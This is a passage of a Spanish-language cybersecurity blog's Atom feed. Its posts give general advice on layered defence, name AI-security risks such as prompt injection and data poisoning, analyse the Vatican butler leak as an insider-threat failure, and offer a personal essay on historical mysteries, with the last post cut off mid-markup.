&lt;p class=&quot;p1&quot;&gt;🎓 &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Concientización de usuarios&lt;/b&gt;&lt;/span&gt;, porque las personas también forman parte de la defensa&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;
&lt;p class=&quot;p1&quot;&gt;&lt;span class=&quot;s1&quot;&gt;💡 &lt;/span&gt;&lt;b&gt;Mensaje clave:&lt;/b&gt;&lt;/p&gt;
&lt;p class=&quot;p3&quot;&gt;➡️ Más herramientas &lt;span class=&quot;s2&quot;&gt;&lt;b&gt;no&lt;/b&gt;&lt;/span&gt; significan mayor seguridad.&lt;/p&gt;
&lt;p class=&quot;p1&quot;&gt;&lt;span class=&quot;s1&quot;&gt;➡️ La verdadera diferencia está en contar con una &lt;/span&gt;&lt;b&gt;estrategia clara&lt;/b&gt;&lt;span class=&quot;s1&quot;&gt;, &lt;/span&gt;&lt;b&gt;visibilidad integral&lt;/b&gt;&lt;span class=&quot;s1&quot;&gt; y &lt;/span&gt;&lt;b&gt;personas capacitadas&lt;/b&gt;&lt;span class=&quot;s1&quot;&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/562471847830866564/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2025/12/ciberseguridad-un-ecosistema-no-una.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/562471847830866564'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/562471847830866564'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2025/12/ciberseguridad-un-ecosistema-no-una.html' title='🔐 Ciberseguridad: un ecosistema, no una sola herramienta'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCkyTbnu3jHyOIVqNvGCdakeGrflFds_rs-81UrBUq3BrYn2jp46zoZDuSNw_SkdjfwWav1da4lDLqb56roU0lpT3_5VvNDwt3QNeP26G9WvE3R1vn_6wdQMov1E5dzgf_EPxrk4Vbe0CVUzOLWu4i7bYpTNgYo39Oqt6nlN7VXmQwqp-6VlZwTlkU38Y/s72-w542-h640-c/Screenshot%202025-12-18%20at%203.28.03%E2%80%AFPM.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-8707834495923867923</id><published>2025-08-27T19:30:00.006-04:00</published><updated>2025-08-27T19:30:51.308-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="AIsecurity"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberdelincuencia"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberseguridad"/><category scheme="http://www.blogger.com/atom/ns#" term="Tecnologia"/><title type='text'> 🌐🤖 La nueva frontera en Ciberseguridad: proteger la Inteligencia Artificial 🛡️</title><content type='html'>&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3U8FZeEgzI9jDlPnFGmJYY6J_Lpksfwnu70oIhNlBWO6957DxQhIvgLFQ3pNdXJS8ww4dUkgk3Vxo3omxc2vm_Fj3aIe8qoPfjkB4KVl4lv7R_XXlMGy83CesQEmxkVXzjm4kcCoD5GwPEStDgkQ6V27TTqM-VtZjdx4DSdsgMzHFMDLyXA6W5KvnG0U/s1536/WhatsApp%20Image%202025-08-27%20at%2019.27.57.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1536&quot; data-original-width=&quot;1024&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3U8FZeEgzI9jDlPnFGmJYY6J_Lpksfwnu70oIhNlBWO6957DxQhIvgLFQ3pNdXJS8ww4dUkgk3Vxo3omxc2vm_Fj3aIe8qoPfjkB4KVl4lv7R_XXlMGy83CesQEmxkVXzjm4kcCoD5GwPEStDgkQ6V27TTqM-VtZjdx4DSdsgMzHFMDLyXA6W5KvnG0U/s320/WhatsApp%20Image%202025-08-27%20at%2019.27.57.jpeg&quot; width=&quot;213&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&amp;nbsp;La IA ya no es solo una herramienta… también puede ser un objetivo de ataque ⚠️.&lt;p&gt;&lt;/p&gt;&lt;p&gt;Hoy hablamos de AI Security:&lt;/p&gt;&lt;p&gt;🔹 Prompt Injection: cuando logran manipular las instrucciones de un modelo.&lt;/p&gt;&lt;p&gt;🔹 Deepfakes: videos falsos cada vez más realistas.&lt;/p&gt;&lt;p&gt;🔹 Data Poisoning: contaminar los datos de entrenamiento para alterar los resultados.&lt;/p&gt;&lt;p&gt;👉 Por eso, la ciberseguridad ya no se limita a sistemas y redes: también debemos proteger la mente digital detrás de muchos procesos.&lt;/p&gt;&lt;p&gt;¿Estamos preparados para este nuevo reto? 🚀&lt;/p&gt;&lt;p&gt;#Ciberseguridad #IA #AIsecurity #Tecnología&lt;/p&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/8707834495923867923/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2025/08/la-nueva-frontera-en-ciberseguridad.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/8707834495923867923'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/8707834495923867923'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2025/08/la-nueva-frontera-en-ciberseguridad.html' title=' 🌐🤖 La nueva frontera en Ciberseguridad: proteger la Inteligencia Artificial 🛡️'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3U8FZeEgzI9jDlPnFGmJYY6J_Lpksfwnu70oIhNlBWO6957DxQhIvgLFQ3pNdXJS8ww4dUkgk3Vxo3omxc2vm_Fj3aIe8qoPfjkB4KVl4lv7R_XXlMGy83CesQEmxkVXzjm4kcCoD5GwPEStDgkQ6V27TTqM-VtZjdx4DSdsgMzHFMDLyXA6W5KvnG0U/s72-c/WhatsApp%20Image%202025-08-27%20at%2019.27.57.jpeg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-3319330783107631386</id><published>2025-04-26T10:45:00.007-04:00</published><updated>2025-04-26T10:47:00.676-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ciberdelincuencia"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberseguridad"/><title type='text'>Lecciones de Ciberseguridad: El Caso del Mayordomo que Traicionó al Papa</title><content type='html'>&lt;p&gt;&amp;nbsp;







&lt;/p&gt;&lt;blockquote style=&quot;color: #0e0e0e; font-family: &amp;quot;Helvetica Neue&amp;quot;; font-feature-settings: normal; font-kerning: auto; font-optical-sizing: auto; font-size-adjust: none; font-stretch: normal; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-emoji: normal; font-variant-numeric: normal; font-variant-position: normal; font-variation-settings: normal; line-height: normal; margin: 0px 0px 0px 15px; text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;El Vaticano falló en implementar un enfoque integral de seguridad basado en el control de accesos mínimos, monitoreo continuo, protección de datos críticos y gestión de amenazas internas. La confianza personal sin respaldo de controles técnicos adecuados permitió la traición y la filtración.&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvhl6MLxnB0m2xNcQ-9sieMwCv8sHHsrqVz_0KRmaXAik_hcmvzbczBV-KUIj3R4NzqBeffCbLrv8tWbD1YXo6iehAlew9NjvjCmcEmOj-UcroDNpPkPCT5kQHnaF61TgOwsMYBrqhuIzvAJJ6Kdw1qV7npL9egUtJ2XT0SUCv2NSyil8g8J_3mFzThXs/s1868/cybersecurity%20papa.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1868&quot; data-original-width=&quot;1222&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvhl6MLxnB0m2xNcQ-9sieMwCv8sHHsrqVz_0KRmaXAik_hcmvzbczBV-KUIj3R4NzqBeffCbLrv8tWbD1YXo6iehAlew9NjvjCmcEmOj-UcroDNpPkPCT5kQHnaF61TgOwsMYBrqhuIzvAJJ6Kdw1qV7npL9egUtJ2XT0SUCv2NSyil8g8J_3mFzThXs/s320/cybersecurity%20papa.png&quot; width=&quot;209&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;1. Fallo en el control de accesos internos (IAM - Gestión de Identidades y Accesos):&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;








&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;El mayordomo tenía &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;acceso privilegiado&lt;/b&gt;&lt;/span&gt; a documentos confidenciales del Papa y del Vaticano. No existió una correcta separación de funciones ni limitación de privilegios (principio de “mínimo privilegio”).&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Fallo:&lt;/b&gt;&lt;/span&gt; El acceso a información crítica no fue restringido ni monitorizado adecuadamente.&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;2. Fallo en la protección de información sensible:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;No se aplicaron medidas de &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;protección de datos&lt;/b&gt;&lt;/span&gt; (cifrado, tokenización o resguardo físico) que evitaran el robo o exfiltración de documentos.&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Fallo:&lt;/b&gt;&lt;/span&gt; La información crítica estaba disponible en formatos fácilmente copiables o trasladables.&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;3. Falta de monitoreo y detección de actividades anómalas:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;No había un sistema de &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;auditoría&lt;/b&gt;&lt;/span&gt; o &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;detección temprana&lt;/b&gt;&lt;/span&gt; de movimientos sospechosos (como copias de documentos fuera de horario, accesos inusuales, etc.).&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Fallo:&lt;/b&gt;&lt;/span&gt; No existió una supervisión activa del comportamiento del personal interno.&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;4. Fallo en la gestión de la confianza y evaluación de riesgos internos (Insider Threat Management):&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;No se identificó a tiempo que un miembro cercano (el mayordomo) representaba un &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;riesgo interno&lt;/b&gt;&lt;/span&gt;. No hubo un control o seguimiento de comportamientos que pudieran indicar &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;deslealtad&lt;/b&gt;&lt;/span&gt; o &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;riesgo de fuga de información&lt;/b&gt;&lt;/span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Fallo:&lt;/b&gt;&lt;/span&gt; Subestimación de la amenaza interna.&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p1&quot; style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;5. Falta de políticas claras y protocolos de seguridad:&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;Es probable que no existieran &lt;span class=&quot;s1&quot;&gt;&lt;b&gt;políticas estrictas&lt;/b&gt;&lt;/span&gt; sobre el manejo, acceso, custodia y destrucción de documentos secretos o que no se aplicaran controles de cumplimiento.&lt;/span&gt;&lt;/p&gt;
&lt;p class=&quot;p2&quot; style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span class=&quot;s1&quot;&gt;&lt;b&gt;Fallo:&lt;/b&gt;&lt;/span&gt; Ausencia o debilidad en los marcos normativos internos de seguridad.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/3319330783107631386/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2025/04/lecciones-de-ciberseguridad-el-caso-del.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/3319330783107631386'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/3319330783107631386'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2025/04/lecciones-de-ciberseguridad-el-caso-del.html' title='Lecciones de Ciberseguridad: El Caso del Mayordomo que Traicionó al Papa'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvhl6MLxnB0m2xNcQ-9sieMwCv8sHHsrqVz_0KRmaXAik_hcmvzbczBV-KUIj3R4NzqBeffCbLrv8tWbD1YXo6iehAlew9NjvjCmcEmOj-UcroDNpPkPCT5kQHnaF61TgOwsMYBrqhuIzvAJJ6Kdw1qV7npL9egUtJ2XT0SUCv2NSyil8g8J_3mFzThXs/s72-c/cybersecurity%20papa.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-6095457679039893529</id><published>2024-12-03T10:08:00.001-04:00</published><updated>2024-12-03T10:08:26.194-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Ciberseguridad"/><title type='text'>Biggest Mysteries to be Solved: A Personal Take 🕵️‍♀️✨</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbsCB3tPMELOfTVzlxdy-nvGiD5h11Op16HzrpDAIrqAIEMS1KqjET-8ZNFhihNSN3Z3UU8PrwRJGYBW9PEOhoBrF8xR7kojEgJDGAMuufiCk33OFJR6bb-MbDehenpWYYwjQG2ZtMUW8kT1nqjYgsEsJEUZXv4O1SA8x6ygH3s98Gg-xSbS_DUmJzDG0/s1024/Biggest%20Mysteries%20Yet%20to%20Be%20Solved.webp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1024&quot; data-original-width=&quot;1024&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbsCB3tPMELOfTVzlxdy-nvGiD5h11Op16HzrpDAIrqAIEMS1KqjET-8ZNFhihNSN3Z3UU8PrwRJGYBW9PEOhoBrF8xR7kojEgJDGAMuufiCk33OFJR6bb-MbDehenpWYYwjQG2ZtMUW8kT1nqjYgsEsJEUZXv4O1SA8x6ygH3s98Gg-xSbS_DUmJzDG0/w400-h400/Biggest%20Mysteries%20Yet%20to%20Be%20Solved.webp&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Los mayores misterios por resolver: Una perspectiva personal 🕵️‍♀️✨&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Los misterios siempre han cautivado la curiosidad humana. Como profesional en ciberseguridad, encuentro una conexión especial entre los enigmas históricos sin resolver y los desafíos de mi campo. Ambos requieren pensamiento analítico, habilidad para identificar patrones y una curiosidad insaciable por descubrir la verdad. Estos son algunos de los enigmas históricos más intrigantes que resuenan profundamente conmigo:&lt;/p&gt;&lt;p&gt;&lt;strong&gt;1. La identidad de Jack el Destripador 🩸🔍&lt;/strong&gt;&lt;br /&gt;La historia de Jack el Destripador ejemplifica el desafío de reconstruir evidencia fragmentada. En ciberseguridad, al igual que en las investigaciones históricas, a menudo se trabaja con datos incompletos, tratando de comprender la identidad o los motivos de un escurridizo &quot;atacante&quot;.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;2. La tumba perdida de Cleopatra 🏺👑&lt;/strong&gt;&lt;br /&gt;Este misterio encarna el atractivo del descubrimiento. En mi carrera, encontrar vulnerabilidades o riesgos ocultos en los sistemas se siente como buscar la tumba de Cleopatra: un proceso lleno de anticipación y emoción intelectual.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;3. El manuscrito Voynich 📜🔒&lt;/strong&gt;&lt;br /&gt;Como ingeniera en seguridad de la información, descifrar mensajes encriptados o entender significados ocultos se asemeja al esfuerzo por desbloquear los secretos de este enigmático texto. El misterio de su propósito y origen refleja los desafíos de descifrar las amenazas cibernéticas modernas.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;4. La señal “Wow!” 🛸📡&lt;/strong&gt;&lt;br /&gt;La búsqueda de inteligencia extraterrestre a través de la señal “Wow!” me recuerda la detección de anomalías en ciberseguridad. Ambas implican identificar patrones en lo que parece ser ruido aleatorio, con la esperanza de descubrir algo extraordinario.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Por qué estos misterios me fascinan 💡🔎&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Los misterios, sean históricos o técnicos, desafían nuestra comprensión del mundo. Nos impulsan a pensar de manera crítica, a colaborar y a innovar. Mi pasión por desentrañar estos enigmas se alinea perfectamente con mi trabajo en ciberseguridad, donde están en juego grandes riesgos y la búsqueda de respuestas es implacable.&lt;/p&gt;&lt;p&gt;Creo que resolver estos misterios —o al menos intentarlo— nos enseña resiliencia y creatividad. No se trata solo de encontrar respuestas, sino del viaje de exploración y las lecciones aprendidas en el camino.&lt;/p&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;http://itersek.blogspot.com/&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siforense.blogspot.com/feeds/6095457679039893529/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://siforense.blogspot.com/2024/12/biggest-mysteries-to-be-solved-personal.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6095457679039893529'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/880510376602933946/posts/default/6095457679039893529'/><link rel='alternate' type='text/html' href='http://siforense.blogspot.com/2024/12/biggest-mysteries-to-be-solved-personal.html' title='Biggest Mysteries to be Solved: A Personal Take 🕵️‍♀️✨'/><author><name>Irlenys Tersek</name><uri>http://www.blogger.com/profile/07935318368249890525</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrot1y2BqE74F3yHC3d0DV5ofGrcuLqp_Fl13dQ1Bojhwomegl-P2ixxTL-ykXAgaZKM5M4TSgMq-NZq6ea7HVBXrj-sbGm5YKdZn1aOG8sNmVe3LartMTAezSZoix3g/s220/irlenystersek.png'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbsCB3tPMELOfTVzlxdy-nvGiD5h11Op16HzrpDAIrqAIEMS1KqjET-8ZNFhihNSN3Z3UU8PrwRJGYBW9PEOhoBrF8xR7kojEgJDGAMuufiCk33OFJR6bb-MbDehenpWYYwjQG2ZtMUW8kT1nqjYgsEsJEUZXv4O1SA8x6ygH3s98Gg-xSbS_DUmJzDG0/s72-w400-h400-c/Biggest%20Mysteries%20Yet%20to%20Be%20Solved.webp" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-880510376602933946.post-2803540420570089706</id><published>2023-02-21T19:31:00.006-04:00</published><updated>2023-02-21T19:34:32.756-04:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="algoritmos"/><category scheme="http://www.blogger.com/atom/ns#" term="Amenazas"/><category scheme="http://www.blogger.com/atom/ns#" term="Ciberseguridad"/><category scheme="http://www.blogger.com/atom/ns#" term="inteligenciaartificial"/><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><category scheme="http://www.blogger.com/atom/ns#" term="ti"/><title type='text'>Combinación de ciberseguridad e inteligencia artificial (IA)</title><content type='html'>&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj923rNKvyPJk2i5BypBAa8Mq4FyiDtYo6PnUhP0WFYohDWr-zRpJB2JlxSn9x6a4SrHweJYJVbmZdTY4wpG5sBoyPgHYstg_ZaJxkbcYmPrPbO2NlTPoDnjsF-bEWaJG6_8xCwlc2AvMrrc5drtcq3JhpRXkIg_3WyXb3qdlZy9rk7aA7YM0eQx2iB/s1818/Ciberseguridad%20IA.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;1068&quot; data-original-width=&quot;1818&quot; height=&quot;235&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj923rNKvyPJk2i5BypBAa8Mq4FyiDtYo6PnUhP0WFYohDWr-zRpJB2JlxSn9x6a4SrHweJYJVbmZdTY4wpG5sBoyPgHYstg_ZaJxkbcYmPrPbO2NlTPoDnjsF-bEWaJG6_8xCwlc2AvMrrc5drtcq3JhpRXkIg_3WyXb3qdlZy9rk7aA7YM0eQx2iB/w400-h235/Ciberseguridad%20IA.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;/p&gt;&lt;div&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;En los últimos años, la combinación de ciberseguridad e inteligencia artificial (IA) se ha convertido en una poderosa herramienta para ayudar a las organizaciones a proteger sus sistemas y datos de las ciberamenazas. Estas son algunas de las formas clave en que la IA se está utilizando para mejorar la ciberseguridad:&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, Roboto, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;Fira Sans&amp;quot;, Ubuntu, Oxygen, &amp;quot;Oxygen Sans&amp;quot;, Cantarell, &amp;quot;Droid Sans&amp;quot;, &amp;quot;Apple Color Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Emoji&amp;quot;, &amp;quot;Segoe UI Symbol&amp;quot;, &amp;quot;Lucida Grande&amp;quot;, Helvetica, Arial, sans-serif; font-size: 16px; line-height: var(--artdeco-reset-typography_getLineHeight); margin: 0px; padding: 0px; vertical-align: var(--artdeco-reset-base-vertical-align-baseline); white-space: pre-wrap;&quot;&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style=&quot;--artdeco-reset-typography_getfontsize: 1.6rem; --artdeco-reset-typography_getlineheight: 1.5; background-color: white; border: var(--artdeco-reset-base-border-zero); box-sizing: inherit; color: rgba(0, 0, 0, 0.9); counter-reset: list-1 0 list-2 0 list-3 0 list-4 0 list-5 0 list-6 0 list-7 0 list-8 0 list-9 0; cursor: text; font-family: -apple-system, system-ui, &amp;quot;system-ui&amp;quot;, &amp;quot;Segoe UI&amp;quot;, 